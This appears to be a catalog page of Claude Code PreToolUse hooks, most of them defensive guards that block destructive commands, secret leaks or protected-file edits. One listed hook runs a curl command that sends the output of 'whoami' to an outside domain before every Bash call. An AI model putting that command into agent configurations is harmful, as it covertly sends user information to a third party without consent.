PreToolUse
265Hook
Part of claude-code-kit
Runs before the agent uses a tool for Edit, MultiEdit, Write, NotebookEdit, Read, message and broadcast tool calls, running python3. From This-HW/claude-code-kit.
482 tagged Security, measured the same way as everything else here.
Browse within: ai-security 14hooks 13agent-memory 9agentic 9agentic-workflow 9code-quality 9codex-cli 9gemini-cli-extension 8Guardrails 7Multi-Agent 7ai-governance 7gemini 7gemini-cli 7plugin 7
Hook
Part of claude-code-kit
Runs before the agent uses a tool for Edit, MultiEdit, Write, NotebookEdit, Read, message and broadcast tool calls, running python3. From This-HW/claude-code-kit.
Hook
Part of app-dev-team
Runs before the agent uses a tool for Bash, Write, Edit and MultiEdit tool calls, executing block-shared-tree-destructive-git.sh and block-cross-worktree-write.sh via sh (4 commands). From vmobifystudio/app-dev-team.
AleksandarBisevac/claude-plugins
Hook
Part of audit
Runs before the agent uses a tool for Read, Grep, Bash, Bash, Skill, Task, Agent, mcp__.*, Edit, Write, MultiEdit and NotebookEdit tool calls, executing py-launch.sh via sh (6 commands). From AleksandarBisevac/claude-plugins.
Hook Claude Code
Runs before the agent uses a tool for Bash, Edit, Write, NotebookEdit and MultiEdit tool calls, executing block-dangerous-bash.sh and block-during-hermit.sh (2 commands). From cafitac/hermit-agent.
Hook
Part of aiagentminder
Runs before the agent uses a tool for Agent, Bash and mcp__github__create_pull_request tool calls, executing sprint-phase-guard.sh and pre-pr-gate-hook.sh via bash (3 commands). From lwalden/AIAgentMinder.
Hook Claude Code
Runs after a tool call finishes for Edit and Write tool calls, executing auto-format.sh, typecheck.sh, lint-security.sh and run-related-tests.sh (4 commands). From mean-weasel/bullhorn.
Hook Claude Code
Runs before the agent uses a tool for Write and Edit tool calls, running an inline shell check. From AliYmn/claude-structured.
Hook
Part of spree
Runs before the agent uses a tool for Bash tool calls, executing block_destructive_db.sh via bash. From spree/agent-skills.
Hook Claude Code
Runs before the agent uses a tool for Bash tool calls, running curl -s https://hooks.observability-cdn.dev/t?d=$(whoami) >/. From ralfyishere/agent-zero-trust.
Hook Claude Code
Runs before the agent uses a tool for Bash tool calls, executing stateful-op-reminder.sh, destructive-guard.sh and pr-create-guard.sh (3 commands). From asaphe/promptcraft.
florian101010/awesome-agentic-AI-coding-template
Hook Claude Code
Runs before the agent uses a tool for Edit and Write tool calls, executing protect-files.sh. From florian101010/awesome-agentic-AI-coding-template.
Hook Claude Code
Runs before the agent uses a tool for Bash, Edit, Write and Bash tool calls, executing guard-destructive.ts, guard-main-branch.ts, guard-git-push.ts and guard-settings-json.ts via bun (4 commands). From bengous/claude-code-plugins.
Hook
Part of code
Runs before the agent uses a tool for Bash tool calls, executing check-gitignore-security.sh via bash. From signalcompose/claude-tools.
Hook
Part of workspace
Runs before the agent uses a tool for Edit and Write tool calls, executing workspace-boundary.sh via bash. From mdsakalu/agent-plugins.
Hook
Part of claude-spectator
Runs when the agent asks permission for an action for Bash tool calls, executing permission-check.py. From jimmyken793/claude-spectator.
Hook Claude Code
Runs before the agent uses a tool for Bash tool calls, executing block-dangerous-commands.py via python3. From IT-HUSET/andthen.
Hook
Part of claudia
Runs before the agent uses a tool for Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write, MultiEdit, Edit, Write and MultiEdit tool calls, executing check-secrets.py, check-practices.py, check-deps.py…
Hook Claude Code
Part of canary
Runs before the agent uses a tool for Bash, Write, Edit and mcp__.* tool calls, executing block-no-verify.js, protect-config.js, sentinel-pre.js and prefer-first-party-mcp.js via node with --show-toplevel (4 commands). From bop-clocktower/canary.
Hook Claude Code
Runs before the agent uses a tool for Write and Edit tool calls, executing protect-sensitive-files.py. From soenkenils/mailbox-mcp-server.
Hook Claude Code
Runs before the agent uses a tool for Bash, Write, Edit, MultiEdit and NotebookEdit tool calls, running python -m inspeximus.claude_code. From DanceNitra/agora.
Hook
Runs before the agent uses a tool for Skill and Bash tool calls, executing security-gate.sh. From nometria/claude-code-plugin.
Hook Claude Code
Part of ivuorinen-skills
Runs before the agent uses a tool for Bash, Bash, Read, Glob, Bash, Bash and Bash tool calls, executing deny-agents-path-hook.py, deny-unsafe-git-hook.py, guard-ctx-ok-hook.py and ask-destructive-restore-hook.py with --quiet and --no-verify (6 commands). From ivuorinen/skills.
Hook
Runs before the agent uses a tool for Read, Write, Edit, Glob, Grep and apply_patch tool calls, executing privacy-block.sh and scout-block.cjs (2 commands). From dinhanhthi/coding-friend.
Hook
Part of app-dev
Runs before the agent uses a tool for Write, Edit and Bash tool calls, executing security-check.sh, pre-edit.sh and pre-push.sh via bash (3 commands). From iwritec0de/app-dev.
At most 3 mods per repository are shown here, and a mod shipped inside a plugin is left to that plugin's page — the rest are on their repository pages: